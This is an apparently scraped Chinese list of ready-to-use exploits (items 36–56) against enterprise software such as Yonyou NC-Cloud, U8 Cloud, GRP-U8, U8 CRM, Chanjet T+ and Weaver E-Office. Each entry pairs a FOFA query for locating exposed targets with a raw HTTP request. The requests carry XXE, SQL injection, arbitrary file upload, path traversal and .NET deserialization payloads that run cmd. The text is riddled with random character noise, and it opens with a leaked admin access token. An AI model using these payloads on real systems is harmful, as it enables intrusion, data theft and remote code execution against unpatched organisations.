accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
: R: P5 N- Y7 f1 I- |+ H& f! xContent-Length: 190
6 w) \2 O' |" C1 KContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
) G2 b1 Z# L+ @" M* X, s! y
. N1 q/ r0 O- R* u% T--fd28cb44e829ed1c197ec3bc71748df0, |& n+ X& p |1 J6 g) T
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"3 h5 F4 m a" A- g' z
) S7 A5 N5 I0 d+ L
<%out.println(1111*1111);%>
" B; D! d& u% s* {6 b# s$ u--fd28cb44e829ed1c197ec3bc71748df0--8 G- |/ {9 {* w7 x
1 a9 l* b- Y0 G; h4 J
# A4 ~4 s; b9 m! N4 ~36. 用友NC-Cloud soapFormat XXE
6 w! X7 W5 F O" P& y- r1 rFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
J1 q. n" m( o$ n% u& ^POST /uapws/soapFormat.ajax HTTP/1.1
5 E+ p1 q/ I8 JHost: 192.168.40.130:8989* X5 i7 b9 I. g" L3 C. Y+ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" U( E: A9 b' A' @7 ?8 \; y
Content-Length: 263
. o, r. g( w2 B+ y) ]' B4 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 p/ O, e' e4 W1 w! } T- FAccept-Encoding: gzip, deflate
! A6 j D3 `* Z0 c8 }3 \0 jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 w2 d( L3 W0 `5 R8 R- b( j. r
Connection: close
$ `2 T6 J( g' K5 f c6 `9 ^+ i% oContent-Type: application/x-www-form-urlencoded% a8 F$ w' u0 b% v! P3 ^! r j: B. C
Upgrade-Insecure-Requests: 1
: {3 Z4 d* G6 G1 N. W
- Z+ C) h- V4 k) i- i# I3 Nmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a# U, E9 `- Q7 ~) r
. s6 C* C; ?: f+ {1 I6 ]$ [6 A0 L. o, F* a8 e0 Z" N( B
37. 用友NC-Cloud IUpdateService XXE
. V) v. Q2 O- EFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
; c5 n5 ]% n. z' \3 _" `POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
( ]+ ?8 |- h1 y. rHost: 192.168.40.130:8989
2 e+ w+ q1 Q) `- eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36, F/ W. f Z" _6 q! e9 M) J2 M
Content-Length: 421
, w. P/ q3 i( ^/ v% [7 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1 O' c2 I! A& v/ d! T. {4 pAccept-Encoding: gzip, deflate
7 N( o/ K4 @0 x5 M/ P0 K GAccept-Language: zh-CN,zh;q=0.9 X6 L" B, Z1 l' i! f1 u/ X# E
Connection: close1 ], |8 Q( v1 b) n
Content-Type: text/xml;charset=UTF-8 y4 z( X- U$ ?- B- }& p
SOAPAction: urn:getResult6 m- f( i1 r0 I* f, c' P8 q4 c
Upgrade-Insecure-Requests: 1 ?2 O( Z9 M# S0 c# C
* ^7 h/ t5 ?; X& K5 D+ C+ Q, o<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
7 w ~( |, {( V- S0 D+ c<soapenv:Header/>) D% ?% o* i: H3 T- k+ @
<soapenv:Body>5 s9 b# \8 l$ A3 M& X2 _5 r
<iup:getResult>
) {% S2 Q7 K9 C% ~<!--type: string-->
/ H+ @; M M# b2 C6 B' k8 |<iup:string><![CDATA[$ B9 y7 n+ f1 ?
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
3 d# Z; V! Y( Y( U. n4 _<xxx/>]]></iup:string>( F9 |, |% D/ M' B f. _" C
</iup:getResult>9 ]3 r* Z8 D* v
</soapenv:Body>5 s' Q9 w; Y7 G) j; {3 X- N
</soapenv:Envelope>0 l8 T! X9 V) w& V) |2 y+ F
3 \6 F6 r3 k+ O1 L" X
. M6 _+ @- b9 n9 J! s. k- L
" L$ x! F) H3 o- n6 ? L5 |38. 用友U8 Cloud smartweb2.RPC.d XXE7 k! |) T8 U' J
FOFA:app="用友-U8-Cloud"
* {9 N+ l; d) _POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1; C8 v; n" a$ R1 ~4 T9 D8 f: k
Host: 192.168.40.131:8088
2 ?# x' \' ~+ ~7 r5 c+ i- e3 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25# c* O4 b9 N9 n* E5 P3 F/ Q
Content-Length: 260
2 ~) g; A0 U x, O6 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
! w. O3 W- s2 O9 J8 }, O9 I+ M# [Accept-Encoding: gzip, deflate( k+ z8 s1 h4 G: V3 }) Q9 s$ V
Accept-Language: zh-CN,zh;q=0.9$ I2 C/ _- u/ c9 F: a9 ?
Connection: close
7 y! {+ b7 O# Q, [5 z8 GContent-Type: application/x-www-form-urlencoded
, x1 `" L" m& H2 y! p0 T: @% A7 G2 H+ M: H9 [' i: {
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
. J0 E L/ p4 r: q( S
7 T" s7 ?% F, Z7 }" v- V2 b/ D+ o8 V2 j6 }
39. 用友U8 Cloud RegisterServlet SQL注入
1 e2 E+ \! D% h. C: {- b+ RFOFA:title="u8c"
4 u. w/ v S V' E1 ]6 ^) [' H: VPOST /servlet/RegisterServlet HTTP/1.1' h3 @; y$ u1 V5 U! G+ I
Host: 192.168.86.128:80896 t& r4 v$ M% i. u2 b7 u! {# S/ y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.367 e ~, j7 Q) g/ {) X( f. J
Connection: close$ e' v; Q+ g/ t4 R+ `4 t# P1 [0 S8 x
Content-Length: 855 @ x3 h8 b. q3 N) Q: a+ ?5 l
Accept: */*
0 c+ P# t" G0 v+ S% x9 m2 ~Accept-Language: en
8 {. Q, z4 C8 e7 M5 _Content-Type: application/x-www-form-urlencoded" F/ M) z* h( y0 C+ h
X-Forwarded-For: 127.0.0.10 s1 }) i# I$ }- n; E+ w1 |
Accept-Encoding: gzip
8 C9 E: a4 w+ k; J `. ]" @
; E) C4 c0 _! b) Wusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--4 x$ P# c: G: t
. H! }/ } a; h. y* g* n. v
! J. u4 X; R* i7 D: V: z/ o
40. 用友U8-Cloud XChangeServlet XXE5 E6 f+ e. P( h3 j- {5 X/ `3 e+ l
FOFA:app="用友-U8-Cloud"0 d4 K: _! Q, _
POST /service/XChangeServlet HTTP/1.1' w& I" V/ x8 A/ ^* l
Host: x.x.x.x! J$ M, {: C4 D3 |
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: ]. |4 _9 f$ |4 ~& V# G* RContent-Type: text/xml
& x, e) C; S1 ^- ~5 l; B2 f8 h2 IConnection: close
9 [3 L' C/ I' C; P2 x
G( r, [8 n j0 }" a! L% v- M<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>0 E# c! C; c; Z" w
+ Q& M! x( a* }# e+ f
- O& {7 Y- h/ O# s! m8 l. {41. 用友U8 Cloud MeasureQueryByToolAction SQL注入% ?' H5 ?# ]6 j" f( n- n
FOFA:app="用友-U8-Cloud"$ @4 J; f. h% V
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
* K3 J7 W7 E3 ?Host:
) Z# @0 M7 P9 `8 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. |! f! r; J/ J: H2 m" s; oContent-Type: application/json. j. S) y3 v4 l m+ X6 q9 ?* L. X, g
Accept-Encoding: gzip1 K# F2 E( [8 \ `* k @! P+ U
Connection: close
5 l4 D! F; C1 p& u6 L0 C/ X3 H0 g* G9 k. L# Y- k% D+ ]6 q
& |) ]& ?: Z# [' ?42. 用友GRP-U8 SmartUpload01 文件上传
7 `4 K! X- z% |" f; RFOFA:app="用友-GRP-U8"9 c) s" |8 v Q7 C
POST /u8qx/SmartUpload01.jsp HTTP/1.1$ S% k+ S& F2 w& C
Host: x.x.x.x$ |% r* A5 }, v& l" r* O4 M& Y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
. s4 b7 j. H9 s# {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
0 [* R6 z; l: \- T8 @# Y: s& g% a! l" R3 H
PAYLOAD/ s: ^5 C( n. S4 Z
1 B1 N% y+ I# e, L# l6 O
) B0 p# X5 r' w6 @6 Q. ?8 @http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
$ k3 O4 [, t6 D) T2 y; a+ Q x/ I8 H6 K
43. 用友GRP-U8 userInfoWeb SQL注入致RCE7 L' S. @7 x& H- M4 h
FOFA:app="用友-GRP-U8"
' J( i3 m b, w8 }' K7 IPOST /services/userInfoWeb HTTP/1.18 ]: W* E+ Y% ^
Host: your-ip/ C9 _- ^8 s; V# z8 v E3 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 z3 k. V* `# f6 C: \4 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, h# a! U( j( p$ k: p
Accept-Encoding: gzip, deflate) F5 ^+ o, k$ E& D, v+ X+ e- p
Accept-Language: zh-CN,zh;q=0.9
& t6 D# ~4 {; |' B& @" Z& j' r( eConnection: close0 ]9 Z8 X+ z8 [! \6 R$ ?- n
SOAPAction:% Y) c( R% }2 v) S% d7 ~4 s9 U) ]
Content-Type: text/xml;charset=UTF-8
' |7 p/ S9 N( n1 q1 ^ }# ]; |! @4 e0 J: H5 [/ V
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
2 `4 j3 Q: N3 Q9 a" v2 b* Z7 H7 u2 I <soapenv:Header/>6 S q1 |% f y" M5 L N2 m* b
<soapenv:Body>
$ ^) Y) H$ [* s7 f' e <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
# x- D8 q; Q+ K$ U) { <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
. U' J$ V' S T" u; I </ser:getUserNameById>
6 T) V: H: j: }- `4 w4 q </soapenv:Body>. H, f( {* o+ ]- a
</soapenv:Envelope>
! }. u4 l; S) q- z8 T" h
( o3 F U* @% M# Q7 W. n
4 Z/ H; ?; C$ q: }. C- e44. 用友GRP-U8 bx_dj_check.jsp SQL注入
2 b5 o1 o' d7 `) K R8 ^& BFOFA:app="用友-GRP-U8"
# Z7 B3 O0 X4 Q" S$ ^- g8 ~GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
- h) F1 j% U% x: y$ D" l9 vHost: your-ip: S. ~6 H$ p7 l, W) }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
# t7 r" e2 X" {& @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( O1 q- E6 g' s: M dAccept-Encoding: gzip, deflate
9 n9 W! B5 F, F5 ^Accept-Language: zh-CN,zh;q=0.9; w& t. `# |8 G
Connection: close: f+ G7 H5 a% l8 k( `& _
& w% C/ {6 x* E' [5 n1 W H1 ~
8 ]1 B* q$ h$ X+ y, R: u45. 用友GRP-U8 ufgovbank XXE3 o$ ^* o/ G G
FOFA:app="用友-GRP-U8"
* K* l0 V+ t/ q6 K( q# E! gPOST /ufgovbank HTTP/1.1
8 }9 q9 P* q5 _3 A6 nHost: 192.168.40.130:222
. _% n# |- L$ {9 j/ H% F0 o, { |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.09 P. ]9 @% d7 ?
Connection: close3 ?$ n( ^5 V3 m& t: {1 h9 o; e
Content-Length: 1613 |6 e' L7 q$ D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 z" N6 u L- }) V; S# s- v+ L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* t. @% M* y- p& E
Content-Type: application/x-www-form-urlencoded
- j' O% ~" [4 u! L U) x! V0 HAccept-Encoding: gzip
6 ~! E; f) ? |( [- r. F* N o; x2 i6 x% m
reqData=<?xml version="1.0"?>
S! ~% W4 u: J2 ~<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
8 m( o. {6 Y- x# i
& K" _: l( M% a9 i4 t6 P. s, w7 v8 a' V; U% o
46. 用友GRP-U8 sqcxIndex.jsp SQL注入+ G8 j0 `& X6 O. {# e4 o- T9 u
FOFA:app="用友-GRP-U8"" W' ?* e: T0 {- P4 ]3 Z J
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1, N# Z' u* r" G
Host: your-ip
/ k/ _: D @5 T% m8 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.362 \2 x& \! b( [0 B8 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- z8 {* }: h m4 n+ Y4 U
Accept-Encoding: gzip, deflate
2 O( v9 t' y8 P3 zAccept-Language: zh-CN,zh;q=0.9
6 A# y( }- b' hConnection: close
9 S; m4 J; e/ Y8 U% O! r4 z+ d1 d7 X
( a0 O4 v7 F) F5 F
47. 用友GRP A++Cloud 政府财务云 任意文件读取
+ g- P" Q3 B% w5 g- ^2 I4 \7 XFOFA:body="/pf/portal/login/css/fonts/style.css"
( {! p' b/ ^# U4 w1 Z h2 vGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1% V; X. b8 d) `# Y
Host: x.x.x.x; L( R* Q4 x5 ]7 s4 p- Y
Cache-Control: max-age=0
l+ y1 n* N$ D( l; }- l fUpgrade-Insecure-Requests: 10 \+ O! Q: ~% F+ G0 f, e- I5 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ }" b$ c4 \: J- |/ E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! L- N. y3 F) N7 E
Accept-Encoding: gzip, deflate, br' B' R. C/ J i1 E p) s9 H
Accept-Language: zh-CN,zh;q=0.9
, k$ W1 z3 b- e& m/ I; {/ p8 TIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT0 e. s# a9 i5 z' J* n" N
Connection: close, N, g# k0 G8 l, X+ A1 Y- D
3 R) w4 ~8 Q. W& n' v+ T! t. O, F: f, ^( C! O8 E Y
1 a8 d# Z; o2 s* }
48. 用友U8 CRM swfupload 任意文件上传6 c% L4 O; P5 S0 H- m
FOFA:title="用友U8CRM"
( k; i5 M3 f& iPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
+ f1 s$ s' A; y4 Z7 S1 {. h/ hHost: your-ip+ d, B/ v3 {5 o7 Y/ Q$ Q% J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ U z$ s3 p( ] f: hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" v; @( E$ `2 w- s1 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ j# y9 A, D6 J" Y
Accept-Encoding: gzip, deflate- {7 Z0 @: o& ^ {9 p# }
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855& L' o+ O5 r0 G8 J0 r
------2695209672394068716424300668550 r4 W$ X u! D+ E( ^* W& Q
Content-Disposition: form-data; name="file"; filename="s.php"& Y' J1 X" C! V; t/ L( S) @
1231! b! b4 C+ k5 P }
Content-Type: application/octet-stream/ Z: M! j( l b: e& l$ z" s& J
------269520967239406871642430066855
& R9 }4 L5 n% `/ A. a' l4 eContent-Disposition: form-data; name="upload"
: }3 h0 N" O$ [" U6 Cupload! f! b; d7 V2 P. Y1 @
------269520967239406871642430066855--6 L, X" u5 t7 l8 U( M
3 z" a1 e) E; V0 m% O$ x* e3 O: t1 x& Q3 ]
49. 用友U8 CRM系统uploadfile.php接口任意文件上传- h1 |, d3 @. N1 c. |
FOFA:body="用友U8CRM"% H: f! w/ d2 ~' u
# K7 X2 I; j6 L9 h6 ]7 iPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.13 `/ y7 n$ @: s& H3 A+ D# t0 Y" e
Host: x.x.x.x
4 |% l1 M& ?9 m0 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" X: Q7 g; m+ G; |( Y% }% D% M
Content-Length: 329" @% z* Y! X: M5 F+ \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 J# p) u: Z `3 HAccept-Encoding: gzip, deflate+ E0 F8 ~0 v& z+ k& ?) x% l+ I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 {+ x$ t9 e: Z; i6 |7 n7 [ {4 k
Connection: close+ a/ [' A* |8 m
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w- |: M: ^+ y( W# m+ E% F$ \/ o; `
( |( i9 m8 W+ j-----------------------------vvv3wdayqv3yppdxvn3w, j- P8 L5 D7 m+ a8 R# O9 E2 |
Content-Disposition: form-data; name="file"; filename="%s.php "9 ]" s1 R9 ~7 B* @1 N& |3 V
Content-Type: application/octet-stream
; C( i! O7 V# C. W7 J! a
! v Z% d, [) v- V" Nwersqqmlumloqa2 O+ s4 Z( B( p, ]5 t
-----------------------------vvv3wdayqv3yppdxvn3w6 T2 ~2 q9 }0 ]5 y2 p0 t
Content-Disposition: form-data; name="upload"' N0 w7 j# H0 l- x" h7 B3 s- l
3 i! R$ n- S( g7 r9 Q$ d6 R! `upload
! }! x k3 d+ c-----------------------------vvv3wdayqv3yppdxvn3w--
' ~3 l2 V% ^0 I6 M- h$ D6 X) @2 _* H- e2 a
; ~$ c# g. f, i/ ?
http://x.x.x.x/tmpfile/updB3CB.tmp.php9 h8 e" o0 I/ \4 l$ L) J
2 I! i6 i- N" _; m! O
50. QDocs Smart School 6.4.1 filterRecords SQL注入. z7 w+ s4 r( U2 C+ H7 ^0 N
FOFA:body="close closebtnmodal"
. g8 w+ l. U; d. U) I$ E9 wPOST /course/filterRecords/ HTTP/1.13 @& [6 D: f. g
Host: x.x.x.x' P1 k$ K' S; Z( N3 {% {' D
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( {) X; @' c/ W0 f4 t* z/ LConnection: close3 A3 Q9 f, r5 g
Content-Length: 2243 `9 i4 u7 Z& W+ N( T3 |
Accept: */*
" V# p& @- G! Q- cAccept-Language: en; K% g# A9 P1 Y* `* o! }
Content-Type: application/x-www-form-urlencoded& y- c, R( C9 D9 _
Accept-Encoding: gzip
* B: x$ Z* A4 k. R! P1 c6 {3 O
& ?' L' x+ y4 ^, a& usearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
" g3 s0 ]( i+ l& J' V8 }$ Q- Z1 P: L: e4 V( R+ t' p
: ?5 j! \" h2 }- E0 m# f! i O4 ]51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
8 w7 }" c# w" r# N$ T3 v3 oFOFA:app="云时空社会化商业ERP系统"! O* j0 X9 f# x% ~2 G5 [* y1 _% z, j# b
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1) J% Q M% J1 Q* q6 v
Host: your-ip# Y' `- {# V2 S' c# A
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
# f8 m8 t7 }. S* o' |/ |$ HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# z% L ]1 }! E3 S) Y3 [8 aAccept-Encoding: gzip, deflate) T' Q; y9 t x/ q! A( K' K
Accept-Language: zh-CN,zh;q=0.9/ n4 I7 ^8 |. R V! F: i) ~. y+ A) S
Connection: close6 N9 [( J! E. P# }
V! D% H! ^3 {. c/ K
) O# ^7 P- N( u1 B, ^. K" m52. 泛微E-Office json_common.php sql注入
) F# Y) t Z' r- c1 H4 N9 @4 Z& l/ oFOFA:app="泛微-EOffice"
4 [+ V% S- d/ n1 R! M$ s; Q5 w! PPOST /building/json_common.php HTTP/1.1
" }8 b3 d0 e$ H; {: U! C8 Z& vHost: 192.168.86.128:8097
T m# u# j! d# A, e; r" N0 AUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 K0 j' s* z8 l
Connection: close4 ?% p; q: B+ j4 d
Content-Length: 87, w% k* x; Q8 C4 }% ^+ B L
Accept: */*
g1 {0 U& A1 ?; i+ Y* P& u( OAccept-Language: en( T: ~) } ~7 z8 G, t
Content-Type: application/x-www-form-urlencoded& t8 M* V0 x" x- [( k" @. }; Y& I( q
Accept-Encoding: gzip
; R0 ?. n: i0 N* S; f* x+ [$ Z% V
% E6 r0 e% r3 atfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
( Q" W# J3 c, w" h/ x n0 k& b& G, A U- _4 r: i' z
! D8 R1 k0 L0 Z( s% Y
53. 迪普 DPTech VPN Service 任意文件上传
2 V" f& `! Z, `2 VFOFA:app="DPtech-SSLVPN"
5 }" B, h9 `5 l6 B/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+ [, d: ?1 c0 e* m: M
1 W4 k% k: Q: G7 J$ _, A, g$ _4 R( g* W+ w
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
7 T Q; z$ I7 I8 b3 L$ BFOFA:app="畅捷通-TPlus"
/ K2 N; w' k$ V% M8 p' N! d第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件% j+ ]4 h8 O6 S6 |
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 E; H9 e2 R& R: K6 L# h
+ F. W. K, o0 m L( w. `/ ?
( R8 T, C6 V9 w$ W. s; H$ P# @完整数据包
& s. A3 Q6 _. j6 |POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.13 W5 b9 z2 Z N# Y
Host: x.x.x.x
* t3 V4 Z" v1 BUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
- A) W- b+ [, S& K! t4 v. F" j0 gContent-Length: 593: _" D5 Y% V6 Y! v$ W( e6 x
7 K$ C* \' X y y" K$ ~. A! J{. P/ Q" J$ |) {- J j0 [
"storeID":{! y; F2 G& }3 {, ]9 [5 v7 O8 T; e- g
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
" {& X9 A3 c, t' u5 G "MethodName":"Start",+ a2 M8 a3 V! s
"ObjectInstance":{7 j0 f7 @- l5 C+ l$ V
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 P; I+ i2 E& I9 C
"StartInfo":{+ g, @ n# W& ?
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",3 Z" ^1 [9 z7 w3 @/ @4 l1 T1 K
"FileName":"cmd",
8 Y2 M2 P$ _6 o "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
) z! y: Z9 e- z3 s }, {0 t$ @( x o
}5 J, F2 B6 [$ |
}
! l; D6 ]. O7 f# }8 ]. g4 n; m}
0 {. f( p2 ~/ V/ @* ?$ \$ ^; ~( \ m1 X( v+ g
5 z% E3 o6 y0 I) g9 V8 L5 k+ k6 \第二步,访问如下url0 S# Z9 s+ l) G# l' w, ~1 {
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
$ G, S# u1 M# G+ n
& f7 J. x( E- b, U f6 S6 {7 t7 _) A) Z8 ~4 g) o1 F8 g
55. 畅捷通T+ getdecallusers信息泄露& t2 V- V" z5 w( e
FOFA:app="畅捷通-TPlus"
% ?) y1 e5 M- h8 C第一步,通过
( D1 d+ E3 b+ D0 p% X7 y; t9 `* l/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie- x# y$ T! m* C- d
第二步,利用获取到的Cookie请求
! }! o: o. j/ h s3 A/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers: ^1 `5 p. v! A- {/ Y
. J# x; K5 w `. D2 `* B/ s/ {; R( V
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
. Z! `5 G+ z8 M8 W, k" @2 R7 IFOFA: app="畅捷通-TPlus"
- a* N7 q( G3 c, ~POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1' e A7 c& [* D, v
Host: x.x.x.x# _. Z( G( C$ r& ?9 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
8 B! W% o, j0 N1 ~! j7 S/ O* \Content-Type: application/json
/ v# Y+ P+ B5 i3 o0 R0 ?5 X. v) Z) `7 k8 I% a0 U/ q( l
{
2 M" S9 b/ J" H/ K& W8 s8 {9 f M "storeID":{" r" Q; h* Y! d9 ]" Y
